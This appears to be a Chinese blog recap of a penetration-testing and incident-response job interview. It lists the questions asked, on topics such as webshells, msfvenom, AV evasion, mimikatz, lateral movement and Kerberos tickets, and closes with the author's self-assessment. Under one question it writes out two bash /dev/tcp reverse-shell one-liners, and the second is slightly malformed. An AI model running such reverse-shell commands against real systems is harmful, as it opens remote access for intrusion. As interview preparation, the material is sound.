使用过安全设备吗?使用过程中发现过真实攻击行为吗?
SRC经验
网络攻防CTF经历
Web OWasp Top10
常见webshell特征(内存马特征)
Goby在用什么版本?(这是没想到的)
Sqlmap参数
Burpsuite常用插件
MSF生成木马命令行(msfvenom 这问题也是我没想到的)
动态免杀(这里要补一下了,不太熟悉)
mimikaze使用
CS插件使用过那些
Linux系统弹shell命令(bash命令)
代码语言:javascript复制bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
/bin/bash -i > /dev/tcp/127.0.0.1/8080 0<& 2>&1横向移动思路
应急响应了解吗(流程,想法,思路)
一台机器装不了杀软,怎么进行排查?(手动排查)
自己打的内网靶场多吗?
权限维持思路?
金银票据区别?
自己写过的EXP多吗,使用那些库?
钓鱼邮件(构造思路以及分析思路)
反制思路
总结
动态免杀方面需要补一下、应急响应方面知识没有构成系统,讲的有点乱
